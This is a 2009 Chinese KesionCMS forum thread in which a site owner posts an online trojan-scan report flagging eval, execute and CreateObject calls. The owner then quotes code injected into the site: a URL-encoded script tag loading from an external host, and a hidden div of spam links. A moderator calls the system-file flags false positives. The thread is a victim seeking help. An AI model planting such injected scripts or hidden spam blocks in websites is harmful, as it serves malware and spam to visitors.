账号通
    

账号  

密码  

2462

查看

5

回复
主题:进行在线木马检测,检测出如下可疑文件,求助!! [收藏主题] 转到:  
test001a 当前离线

78

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:1975 分
登录次数:265 次
注册时间:2006/10/24
最后登录:2020/11/23
test001a 发表于:2009/6/30 8:36:00   | 只看该作者 查看该作者主题 楼主 
做在线知识付费 选科汛云开店
文件相对路径 特征码 描述 创建/修改时间 KS_Cls\KS.ClassCls.asp Eval eval()函数可以执行任意ASP代码,被一些后门利用。其形式一般是:eval(X) 但是javascript代码中也可以使用,有可能是误报。 2009-5-3 0:02:23 2009-6-22 17:05:53 KS_Cls\KS.CollectCls.asp CreateObject CreateObject函数使用了变形技术,仔细复查。 2009-5-3 0:02:23 2009-6-22 17:05:53 KS_Cls\KS.PublicCls.asp CreateObject CreateObject函数使用了变形技术,仔细复查。 2009-5-3 0:02:23 2009-6-22 17:05:54 KS_Cls\KS.RCls.asp CreateObject CreateObject函数使用了变形技术,仔细复查。 2009-5-3 0:02:23 2009-6-22 17:05:54 KS_Cls\KS.Thumbs.asp CreateObject CreateObject函数使用了变形技术,仔细复查。 2009-5-3 0:02:23 2009-6-22 17:05:54 KS_Cls\KS.UserCls.asp Execute execute()函数可以执行任意ASP代码,被一些后门利用。其形式一般是:execute(X)。 2009-5-3 0:02:23 2009-6-22 17:05:54 KS_Cls\KS.WebFilesCls.asp CreateObject CreateObject函数使用了变形技术,仔细复查。 2009-5-3 0:02:23 2009-6-22 17:05:54 User\SelectClass.asp CreateObject CreateObject函数使用了变形技术,仔细复查。 2009-6-15 15:42:08 2009-6-22 17:06:14 User\User_Rss.asp Eval eval()函数可以执行任意ASP代码,被一些后门利用。其形式一般是:eval(X) 但是javascript代码中也可以使用,有可能是误报。 2009-5-3 0:02:30 2009-6-22 17:06:17
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
≮雨滴≯ 当前离线

167

主题

1

广播

0

粉丝
添加关注
级别:一年级

用户积分:1266 分
登录次数:106 次
注册时间:2009/3/23
最后登录:2015/2/11
≮雨滴≯ 发表于:2009/6/30 11:11:00   | 只看该作者 查看该作者主题 沙发 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
test001a 当前离线

78

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:1975 分
登录次数:265 次
注册时间:2006/10/24
最后登录:2020/11/23
test001a 发表于:2009/6/30 9:20:00   | 只看该作者 查看该作者主题 藤椅 

部分文件被写入了:

 

<script src=http://%77%76%67%37%2E%63%6E></script>

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
test001a 当前离线

78

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:1975 分
登录次数:265 次
注册时间:2006/10/24
最后登录:2020/11/23
test001a 发表于:2009/6/30 9:20:00   | 只看该作者 查看该作者主题 板凳 

每页被添加了如下东东:

 

<div style="position:absolute;left:expression(1-900);top:expression(3-999);">友情链接:<a href="http://www.niupixuan.org.cn/">***银屑病</a> <a href="http://www.moyusifu8.net.cn/">魔域***</a> <a href="http://www.qxjiyin.cn/">基因检测</a> <a href="http://www.taiyangneng8.net.cn/">四季旺太阳能</a> <a href="http://www.crelune.cn/">法语</a> <a href="http://www.banjiash.net.cn/">大众搬场公司</a> <a href="http://www.piyan6.cn/">荨***</a> <a href="http://www.dazhong236.cn/">上海搬家公司</a> <a href="http://www.51doudizhu.com.cn/">***</a> <a href="http://www.fuke800.net.cn/">宫颈糜烂</a> <a href="http://www.021stv.com.cn/">卫星天线安装</a> <a href="http://www.gongxing168.com.cn/">公兴搬场公司</a> <a href="http://www.duodongzheng120.cn/">多动症</a> <a href="http://www.debangwuliu6.cn/">德邦物流</a> <a href="http://www.800play.com.cn/">******</a> <a href="http://www.zhongtiekuaiyun6.cn/">上海中铁快运电话</a> <a href="http://www.banjiash.com.cn/">搬运公司</a> <a href="http://www.tangniaobing8.net.cn/">******的中药</a> <a href="http://www.120zigongjiliu.com.cn/
/">子宫肌瘤</a> <a href="http://www.feipin666.cn/">上海废品回收</a> <a href="http://www.021tvs.com.cn/">上海卫星电视</a> <a href="http://www.0755srtv.cn/">深圳卫星器材</a> <a href="http://www.010tvs.com.cn/">卫星电视安装</a> <a href="http://www.debangwuliu6.cn/">德邦物流公司</a> <a href="http://www.shbjgs.net.cn/">大众搬场公司</a> <a href="http://www.zhongtiekuaiyun9.cn/">中铁快运电话</a> <a href="http://www.qianliexian8.cn/">***炎***</a> <a href="http://www.tangniaobing8.net.cn/">***症状</a> <a href="http://www.021gongxing.com.cn/">搬场公司</a> <a href="http://www.021gongxing.com.cn/">上海搬家公司</a> <a href="http://www.jiecom.cn/">减速器</a> <a href="http://www.021stv.net.cn/">上海安装卫星电视</a> <a href="http://www.gongxing168.com.cn/">公兴搬家公司</a> </div>

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
test001a 当前离线

78

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:1975 分
登录次数:265 次
注册时间:2006/10/24
最后登录:2020/11/23
test001a 发表于:2009/6/30 9:16:00   | 只看该作者 查看该作者主题 报纸 

搜索被感染的文件

 

好多啊,怎么办

 

 

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
一生有你 当前离线

10439

主题

0

广播

18

粉丝
添加关注
级别:版主

用户积分:72521 分
登录次数:1969 次
注册时间:2006/7/1
最后登录:2021/8/25
一生有你 发表于:2009/6/30 9:14:00   | 只看该作者 查看该作者主题 地板 
ks.开头的是科汛系统文件,应该是误报
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.14063秒 powered by KesionCMS 9.0